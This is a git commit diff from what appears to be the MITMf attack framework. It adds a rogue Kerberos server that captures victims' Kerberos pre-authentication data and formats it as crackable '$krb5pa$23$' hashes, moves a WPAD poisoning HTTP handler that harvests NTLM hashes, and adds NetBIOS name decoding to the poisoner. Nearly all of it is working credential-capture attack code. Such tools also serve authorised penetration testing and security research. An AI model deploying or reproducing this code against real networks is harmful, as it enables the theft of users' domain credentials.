Kerberos sever back online, squashed some bugs

2025-08-21 05:53:30 -07:00 · 2015-04-30 00:10:55 +02:00 · 2015-04-30 00:10:55 +02:00 · aa4e022ab0
commit aa4e022ab0
parent 6b421d1cac
7 changed files with 93 additions and 77 deletions
--- a/core/responder/fingerprinter/LANFingerprinter.py
+++ b/core/responder/fingerprinter/LANFingerprinter.py
@ -3,9 +3,9 @@ import socket
 import threading
 import struct
 import logging
+import string

 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
-from core.configwatcher import ConfigWatcher
 from core.responder.fingerprinter.RAPLANMANPackets import *

 mitmf_logger = logging.getLogger("mitmf")
@ -60,6 +60,20 @@ def NBT_NS_Role(data):
    else:
        return "Service not known."

+def Decode_Name(nbname):
+    #From http://code.google.com/p/dpkt/ with author's permission.
+    try:
+        if len(nbname) != 32:
+            return nbname
+        l = []
+        for i in range(0, 32, 2):
+            l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
+                       ((ord(nbname[i+1]) - 0x41) & 0xf)))
+        return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
+    except Exception, e:
+        mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e))
+        return "Illegal NetBIOS name"
+
 def WorkstationFingerPrint(data):
    Role = {
        "\x04\x00"    :"Windows 95",
--- a/core/responder/kerberos/KERBServer.py
+++ b/core/responder/kerberos/KERBServer.py
@ -0,0 +1,157 @@
+
+import socket
+import threading
+import struct
+import logging
+
+from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class KERBServer():
+
+	def serve_thread_udp(self, host, port, handler):
+		try:
+			server = ThreadingUDPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e))
+
+	def serve_thread_tcp(self, host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e))
+
+	#Function name self-explanatory
+	def start(self):
+		mitmf_logger.debug("[KERBServer] online")
+		t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
+		t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
+		for t in [t1,t2]:
+			t.setDaemon(True)
+			t.start()
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+class KerbTCP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
+class KerbUDP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
+def ParseMSKerbv5TCP(Data):
+	MsgType = Data[21:22]
+	EncType = Data[43:44]
+	MessageType = Data[32:33]
+	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
+		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[50:51])[0]
+			if HashLen == 54:
+				Hash = Data[53:105]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[153:154])[0]
+				Name = Data[154:154+NameLen]
+				DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
+				Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[45:46])[0]
+			if HashLen == 53:
+				Hash = Data[48:99]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[147:148])[0]
+				Name = Data[148:148+NameLen]
+				DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
+				Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+			if HashLen == 54:
+				Hash = Data[53:105]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[148:149])[0]
+				Name = Data[149:149+NameLen]
+				DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
+				Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+
+		else:
+			Hash = Data[48:100]
+			SwitchHash = Hash[16:]+Hash[0:16]
+			NameLen = struct.unpack('<b',Data[148:149])[0]
+			Name = Data[149:149+NameLen]
+			DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
+			Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
+			BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			return BuildHash
+	else:
+		return False
+
+def ParseMSKerbv5UDP(Data):
+	MsgType = Data[17:18]
+	EncType = Data[39:40]
+	if MsgType == "\x0a" and EncType == "\x17":
+		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[41:42])[0]
+			if HashLen == 54:
+				Hash = Data[44:96]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[144:145])[0]
+				Name = Data[145:145+NameLen]
+				DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
+				Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+			if HashLen == 53:
+				Hash = Data[44:95]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[143:144])[0]
+				Name = Data[144:144+NameLen]
+				DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
+				Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+
+
+		else:
+			Hash = Data[49:101]
+			SwitchHash = Hash[16:]+Hash[0:16]
+			NameLen = struct.unpack('<b',Data[149:150])[0]
+			Name = Data[150:150+NameLen]
+			DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
+			Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
+			BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			return BuildHash
+	else:
+		return False
--- a/core/responder/kerberos/init.py
+++ b/core/responder/kerberos/init.py
--- a/core/responder/nbtns/NBTNSPoisoner.py
+++ b/core/responder/nbtns/NBTNSPoisoner.py
@ -4,6 +4,7 @@ import threading
 import socket
 import struct
 import logging
+import string

 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
 from core.configwatcher import ConfigWatcher
@ -105,7 +106,8 @@ def Decode_Name(nbname):
 			l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
 					   ((ord(nbname[i+1]) - 0x41) & 0xf)))
 		return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
-	except:
+	except Exception, e:
+		mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e))
 		return "Illegal NetBIOS name"

 # NBT_NS Server class.
--- a/core/responder/wpad/WPADPoisoner.py
+++ b/core/responder/wpad/WPADPoisoner.py
@ -2,15 +2,17 @@ import socket
 import threading
 import logging

-from HTTPPackets import *
 from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from core.configwatcher import ConfigWatcher
+from HTTPPackets import *

 mitmf_logger = logging.getLogger("mitmf")

 class WPADPoisoner():

-	def start(on_off):
+	def start(self):
 		try:
+			mitmf_logger.debug("[WPADPoisoner] online")
 			server = ThreadingTCPServer(("0.0.0.0", 80), HTTP)
 			t = threading.Thread(name="HTTP", target=server.serve_forever)
 			t.setDaemon(True)
@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		TCPServer.server_bind(self)

+#HTTP Server Class
+class HTTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(1)
+				data = self.request.recv(8092)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
+					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
+					if Verbose:
+						print Message
+					mitmf_logger.info(Message)
+					self.request.send(buff)
+				else:
+					buffer0 = PacketSequence(data,self.client_address[0])
+					self.request.send(buffer0)
+		except Exception:
+			pass#No need to be verbose..
+
 #Parse NTLMv1/v2 hash.
 def ParseHTTPHash(data,client):
 	LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -214,25 +237,4 @@ def PacketSequence(data,client):

 	else:
 		return str(Basic_Ntlm(Basic))
-
-#HTTP Server Class
-class HTTP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			while True:
-				self.request.settimeout(1)
-				data = self.request.recv(8092)
-				buff = WpadCustom(data,self.client_address[0])
-				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
-					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
-					if Verbose:
-						print Message
-					mitmf_logger.info(Message)
-					self.request.send(buff)
-				else:
-					buffer0 = PacketSequence(data,self.client_address[0])
-					self.request.send(buffer0)
-		except Exception:
-			pass#No need to be verbose..